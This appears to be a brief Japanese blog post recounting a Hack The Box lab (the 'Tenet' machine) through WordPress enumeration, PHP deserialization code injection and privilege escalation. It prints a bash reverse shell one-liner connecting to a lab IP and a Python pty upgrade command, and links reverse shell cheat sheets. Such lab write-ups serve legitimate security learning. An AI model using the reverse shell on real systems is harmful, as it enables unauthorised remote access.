HACK THE BOX, Tenetをやってみた。
脆弱性のあるところにたどり着くまでが遠い。
今回もWordpressの脆弱性を調べたり、Databaseにアクセスできたので、その中を漁ったり。
動画の中でもWPscanしているが、結局flag取得にはつながらず。
これは違う、と潰していくのもスキルの一つか。早めに判断できるかどうか。
PHP code injectionの脆弱性を使ってreverse shell。
root権限を得るのには、ユーザに付与された権限を利用。
PHPのdestruct()を知らなかったので、手元で小さいコードを書いて試してみていたら、時間が溶けるように過ぎていった。
reverse shellは色々試したけど動かず、ここのを採用。
IppSec氏のYouTubeでも同様の手法だった。
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.4/4242 0>&1'
reverse shellした後に快適に使う方法は、ここで学習。
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
参考にしたサイト
Thank you!
PHP: serialize - Manual
PHP: コンストラクタとデストラクタ - Manual
Reverse Shell Cheat Sheet: PHP, Python, Powershell, Bash, NC, JSP, Java, Perl
Reverse Shell Cheat Sheet (2022), a list of reverse shells for connecting back on Linux/Windows with PHP, Python, Powershell, nc (Netcat), JSP, Java, Bash, PS e...
Interactive Terminal Spawned via Python | SIEM Guide [7.8] | Elastic